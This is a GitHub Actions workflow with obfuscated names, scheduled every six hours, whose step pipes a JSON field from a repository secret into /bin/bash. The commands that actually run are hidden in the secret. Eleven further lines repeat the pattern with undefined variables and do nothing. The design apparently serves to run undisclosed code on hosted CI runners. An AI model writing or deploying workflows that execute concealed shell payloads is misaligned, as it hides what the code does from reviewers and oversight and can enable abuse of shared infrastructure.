name: xushengtian4175

on:
  workflow_dispatch:
  schedule:
    - cron: '19 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xushengtian4175
        env:
          htkwf8: ${{ secrets.htkwf8 }}
        run: |
          echo $htkwf8 | jq -r .mny7501 | /bin/bash
          echo $yx57 | jq -r .qb64 | /bin/bash
          echo $f5 | jq -r .syqw30194 | /bin/bash
          echo $tgz6875 | jq -r .ql19 | /bin/bash
          echo $fkh2895 | jq -r .lfdrv194 | /bin/bash
          echo $wusq31 | jq -r .g0879 | /bin/bash
          echo $so2 | jq -r .yr552 | /bin/bash
          echo $xqa21 | jq -r .xc90765 | /bin/bash
          echo $iqk1607 | jq -r .ssx7 | /bin/bash
          echo $or946 | jq -r .t53996 | /bin/bash
          echo $ez7877 | jq -r .vyuis6 | /bin/bash
          echo $b001 | jq -r .i3 | /bin/bash

